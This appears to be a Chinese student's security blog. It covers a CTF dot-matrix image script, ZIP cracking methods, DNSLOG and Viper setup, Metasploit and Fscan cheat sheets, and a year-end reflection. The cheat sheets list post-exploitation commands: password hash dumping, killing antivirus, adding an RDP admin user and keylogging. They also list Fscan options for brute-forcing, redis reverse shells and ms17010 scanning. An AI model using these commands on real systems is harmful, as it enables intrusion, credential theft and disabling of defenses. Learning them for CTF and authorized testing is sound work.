【MISC】图片点阵提取

在打VNCTF2022的时候遇到这样一道题,图片直接放在文章肯能看不清,各位可以点开来仔细观看

放大来看

又是点阵图,这不就是妥妥的点阵提取嘛,打开画图,量出来点之间的距离,然后开造!
结果,出来很意外,每个点之间的距离都是不一样的,都在49~51之间浮动,这就导致直接提取不能提取出有效的信息
好在,每一行每一列的点都在同一条直线上,只要求出最左上角的点,然后跑出每一行每一列的坐标,再拼接即可
拼接的话可以使用OpenCV库,但是Python的PIL(Pillow)好像更胜一筹,于是学了一下写了个脚本

from PIL import Image,ImageDraw
image = Image.open("misc-img-pixel-1.png")
Line=[]
Row=[]
black=image.getpixel((0,0))
for i in range(image.height-1):
    if(image.getpixel((24,i))!=black):
        Row.append(i)
for i in range(image.width-1):
    if(image.getpixel((i,15))!=black):
        Line.append(i)
ret = Image.new('RGB', (len(Line), len(Row)) )
draw = ImageDraw.Draw(ret)
for x in range(len(Line)-1):
    for y in range(len(Row)-1):
        draw.point((x, y), fill=image.getpixel((Line[x],Row[y]))) 
ret.show()
ret.save('result.png')

继续阅读【MISC】图片点阵提取

【MISC】ZIP压缩文件汇总

MISC题目中,ZIP压缩包一般会有五种破解方式

  1. 暴力
  2. 字典
  3. 明文
  4. 冗余数据
  5. 伪加密

一般来说我们可以使用ARCHPR来帮助我们破解ZIP
在得到一个压缩包的时候,我们应该先阅读属性内容,里面能给你一些解题提示
这个就提示我们要六位暴力

以下就是提示我们可能存在冗余数据

其次,我们还可能存在字典,当然啦,我们要有对应的字典才行

在打开压缩包的时候,我们可以留意一下内外压缩包的文件时候有CRC校验码相同的,如果有我们可以尝试明文破解口令。
但是我们也可以不破解口令,直接通过密钥解密文件

在处理冗余数据时,我们可以采用binwalk判断冗余数据,并且binwalk -e提取,有时候不行的话还是自己动手吧

以上四种都很好理解,伪加密我们要使用WinHex打开,修改加密位完成

继续阅读【MISC】ZIP压缩文件汇总

【渗透工具】DNSLOG搭建

Dnslog相信渗透的都不陌生,但我只是在Apache Log4j后才意识到这东西是有多好用
但是有些时候,知名的dnslog.cn网站就会崩溃。
既然这样,干脆就自己搭一个,但是过程十分艰辛。
由于我设置了@*解析,我就不需要再对ns1.xxx.cn/ns2.xxx.cn进行解析
具体如下


然后我们就接着物色dnslog平台
一个非常古老的BugScanTeam的DNSLOG
于是乎,调了好久,6年前的代码,还要改cdn,还要改ssl(开发组历史遗留问题)
最后改完了,发现一直301,查看issue才发现要修改

SECURE_SSL_REDIRECT = False

然而,无论怎么修改数据库,还是进不去他的管理界面!
之后只好另谋出路,最后找到这个
编译好的GO语言的DNSLOG
再配上万能的堡塔和Nginx反代

在经历了2h的磨难后

对了最后记得开放UDP53端口(DNS服务)
开始休息了~

【渗透工具】MSFCONSOLE控制台使用和操作

Metasploit一款开源安全漏洞检测工具,其不断更新的Payload使其成为了最强大的渗透框架之一
对于MSFCONSOLE(简称MSF),就不多赘述安装部署了,对于日常渗透使用一般可以再Viper中使用。
常见参数解读:

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled < length> 为payload预先指定一个NOP滑动长度
-f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64
–platform < platform> 指定payload的目标平台
-s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小
-b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 '\x0f'、'\x00';
-i, –iterations < count> 指定payload的编码次数
-c, –add-code < path> 指定一个附加的win32 shellcode文件
-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out < path> 指定创建好的payload的存放位置
-v, –var-name < name> 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表

查看所有payloads

--list payloads

使用msfvenom --list encoders可查看所有编码器
还有一些小应用

run hashdump #获取windows密码hash
#关闭杀软
run killav
run post/windows/manage/killav
#操控远程桌面
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp username=test password=test添加远程桌面的用户(同时也会将该用户添加到管理员组)
#键盘捕捉(Viper有功能)
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能

【渗透工具】Fscan

Github仓库
Fscan是一款内网综合扫描工具,以下为常用命令

fscan -h 0.0.0.0/8 (全网段扫描)
fscan -h 192.168.1.1/24  (默认使用全部模块)
fscan -h 192.168.1.1/16  (B段扫描)
其他用法
fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan -hf ip.txt  (以文件导入)
fscan -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)

具体什么时候使用呢!什么时候都可以!尤其是目标机器连python都跑不起来的时候还怎么渗透内网~

  -c string
        ssh命令执行
  -cookie string
        设置cookie
  -debug int
        多久没响应,就打印当前进度(default 60)
  -domain string
        smb爆破模块时,设置域名
  -h string
        目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        读取文件中的目标
  -hn string
        扫描时,要跳过的ip: -hn 192.168.1.1/24
  -m string
        设置扫描模式: -m ssh (default "all")
  -no
        扫描结果不保存到文件中
  -nobr
        跳过sql、ftp、ssh等的密码爆破
  -nopoc
        跳过web poc扫描
  -np
        跳过存活探测
  -num int
        web poc 发包速率  (default 20)
  -o string
        扫描结果保存到哪 (default "result.txt")
  -p string
        设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
  -pa string
        新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
  -path string
        fcgi、smb romote file path
  -ping
        使用ping代替icmp进行存活探测
  -pn string
        扫描时要跳过的端口,as: -pn 445
  -pocname string
        指定web poc的模糊名字, -pocname weblogic
  -proxy string
        设置代理, -proxy http://127.0.0.1:8080
  -user string
        指定爆破时的用户名
  -userf string
        指定爆破时的用户名文件
  -pwd string
        指定爆破时的密码
  -pwdf string
        指定爆破时的密码文件
  -rf string
        指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
  -rs string
        redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
  -silent
        静默扫描,适合cs扫描时不回显
  -sshkey string
        ssh连接时,指定ssh私钥
  -t int
        扫描线程 (default 600)
  -time int
        端口扫描超时时间 (default 3)
  -u string
        指定Url扫描
  -uf string
        指定Url文件扫描
  -wt int
        web访问超时时间 (default 5)

【VIPER】部署、监听、代理

前导

Viper中文炫彩蛇,为图形化的渗透平台,用户可以使用浏览器登录完成诸如(覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类)操作,并提供内网隧道,文件管理,命令行等常用渗透工具。
在进行内网渗透中,还有内网网络拓扑等可视化工具提高工作效率。

安装

快捷部署有Docker和F8X一键部署两种方式
下方为f8x一件部署,推荐在全新linux环境中使用

curl -o f8x https://f8x.io/   # wget -O f8x https://f8x.io/
bash f8x -viper

我所使用的时Docker安装,并在wsl(Docker on desktop)和linux(CentOS 7)系统下都进行过部署

sudo -s
yum install docker -y
yum install docker-compose -y
systemctl enable docker
service docker restart
#安装Docker并设置自启动
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
newgrp - docker
#假如Docker权限组
export VIPER_DIR=/root/VIPER
export VIPER_PASSWORD=YOUR_PWD
#确认自己的安装目录与密码
mkdir -p $VIPER_DIR && cd $VIPER_DIR
tee docker-compose.yml <<-'EOF'
version: "3"
services:
  viper:
    image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest
    container_name: viper-c
    network_mode: "host"
    restart: always
    volumes:
      - ${PWD}/loot:/root/.msf4/loot
      - ${PWD}/db:/root/viper/Docker/db
      - ${PWD}/module:/root/viper/Docker/module
      - ${PWD}/log:/root/viper/Docker/log
      - ${PWD}/nginxconfig:/root/viper/Docker/nginxconfig
    command: ["VIPER_PASSWORD"]
EOF
sed -i "s/VIPER_PASSWORD/$VIPER_PASSWORD/g" docker-compose.yml
cd $VIPER_DIR
docker-compose config
#确认DockerFile正确
docker-compose up -d
#启动容器

在WSL中,有一点使用docker的host mode容易端口冲突,所以docker-compose.yml要修改成如下,并自行确认端口映射(60000一定要开以外,其他多开点)

version: "3"
services:
  viper:
    image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest
    container_name: viper-c
    restart: always
    ports:
      - "60000-60099:60000-60099"
    volumes:
      - ${PWD}/loot:/mnt/d/Docker/viper/.msf4/loot
      - ${PWD}/db:/mnt/d/Docker/viper/db
      - ${PWD}/module:/mnt/d/Docker/viper/module
      - ${PWD}/log:/mnt/d/Docker/viper/log
      - ${PWD}/nginxconfig:/mnt/d/Docker/viper/nginxconfig
    command: ["VIPER_PASSWORD"]

之后访问https://YourDomain:60000root账户和你的密码,登录Viper

继续阅读【VIPER】部署、监听、代理

Goodbye 2021,Hello 2022.

转眼间2021年就只剩下了最后一天了。
在同学的提醒下,发现上一年居然没有总结,不过也没关系了,高中生活已经给我留下了弥足珍贵的回忆了。
Lightness
过去的一年里,我结束了我的高中生活,在陌生的城市新的校园,开启了新的一段旅程。
在深圳大学,结识了许多“有趣的灵魂”,也体会到了人外有人天外有天的“学霸与卷王”。
很意外,我居然能很快融入新的环境,可以与学长们一起学习新的知识,了解更多新的技术,也很感谢学长们的帮助。
虽然退役了很久了,但是竞赛人竞赛魂,我还是参加了一些学校的小比赛。纵使离经叛道,没有继续在ACM的路上走下去。可喜的是,在CTF我重拾往日竞赛的热血与激情,相信我在新的道路上可以走得更远。
其实,我感觉,大学的生活远比高中要累,至少在高中,有唯一的目标——高考。不过,我也在深大找到了归属,找回了我所向往的事物。虽然很累很忙,但感觉很充实。
最后,也许应该要写下些下一年的愿望吧,虽然不知道改写些什么,很多事情不是当作愿望写出来就能实现的,更多是自己的抉择,自己的努力。
还是以我最喜欢的一句话结尾吧,“愿有人能永远记住那夜的烟花,即使时过境迁,活在那霎那的烟花已然永恒”。
Darkness